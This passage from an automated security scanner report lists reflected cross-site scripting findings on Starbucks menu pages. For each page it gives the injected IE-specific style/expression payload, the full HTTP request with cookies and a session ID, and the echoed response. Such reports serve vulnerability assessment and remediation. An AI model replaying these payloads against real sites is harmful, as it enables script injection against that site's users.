<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style="x:expression(alert(1))"b0d39f9484b=1"/> ...[SNIP]...
1.759. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7c87"style="x:expression(alert(1))"ae192e3c688 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:33 GMT Connection: close Content-Length: 45510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style="x:expression(alert(1))"ae192e3c688=1"/> ...[SNIP]...
1.760. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea630"style="x:expression(alert(1))"09dc08373b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:33:15 GMT Connection: close Content-Length: 43324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style="x:expression(alert(1))"09dc08373b2=1"/> ...[SNIP]...
1.761. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61386"style%3d"x%3aexpression(alert(1))"1ed5d722818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61386"style="x:expression(alert(1))"1ed5d722818 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style%3d"x%3aexpression(alert(1))"1ed5d722818=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:33:08 GMT Connection: close Content-Length: 44974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style="x:expression(alert(1))"1ed5d722818=1"/> ...[SNIP]...
1.762. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e38"style="x:expression(alert(1))"2b26c7960fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:33:13 GMT Connection: close Content-Length: 45105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style="x:expression(alert(1))"2b26c7960fc=1"/> ...[SNIP]...
1.763. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ffa"style="x:expression(alert(1))"445beb5d76e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:57 GMT Connection: close Content-Length: 45546
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style="x:expression(alert(1))"445beb5d76e=1"/> ...[SNIP]...
1.764. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38463"style%3d"x%3aexpression(alert(1))"4a36fa03848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38463"style="x:expression(alert(1))"4a36fa03848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style%3d"x%3aexpression(alert(1))"4a36fa03848=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:33:07 GMT Connection: close Content-Length: 45029
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style="x:expression(alert(1))"4a36fa03848=1"/> ...[SNIP]...
1.765. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8fd2"style="x:expression(alert(1))"aae7138fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:33:38 GMT Connection: close Content-Length: 45195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style="x:expression(alert(1))"aae7138fd=1"/> ...[SNIP]...
1.766. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 273ef"style="x:expression(alert(1))"6997b4054c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:33 GMT Connection: close Content-Length: 45219
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style="x:expression(alert(1))"6997b4054c9=1"/> ...[SNIP]...
1.767. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a811"style="x:expression(alert(1))"b915f0e0432 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:34:09 GMT Connection: close Content-Length: 45446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style="x:expression(alert(1))"b915f0e0432=1"/> ...[SNIP]...
1.768. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68dcf"style="x:expression(alert(1))"65b8aeb2cb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:34:12 GMT Connection: close Content-Length: 45045
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style="x:expression(alert(1))"65b8aeb2cb6=1"/> ...[SNIP]...
1.769. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed35a"style="x:expression(alert(1))"d1c3ede59d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:35:17 GMT Connection: close Content-Length: 45258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style="x:expression(alert(1))"d1c3ede59d9=1"/> ...[SNIP]...
1.770. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec96"style%3d"x%3aexpression(alert(1))"349c64eee81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cec96"style="x:expression(alert(1))"349c64eee81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style%3d"x%3aexpression(alert(1))"349c64eee81=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:34:56 GMT Connection: close Content-Length: 45212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style="x:expression(alert(1))"349c64eee81=1"/> ...[SNIP]...
1.771. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71256"style%3d"x%3aexpression(alert(1))"331875fd0d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71256"style="x:expression(alert(1))"331875fd0d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style%3d"x%3aexpression(alert(1))"331875fd0d7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:34:42 GMT Connection: close Content-Length: 43744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style="x:expression(alert(1))"331875fd0d7=1"/> ...[SNIP]...
1.772. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cee5"style%3d"x%3aexpression(alert(1))"c50edecec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cee5"style="x:expression(alert(1))"c50edecec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style%3d"x%3aexpression(alert(1))"c50edecec=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:01 GMT Connection: close Content-Length: 42963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style="x:expression(alert(1))"c50edecec=1"/> ...[SNIP]...
1.773. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ebb"style="x:expression(alert(1))"f3fa25f47de in the application's response.
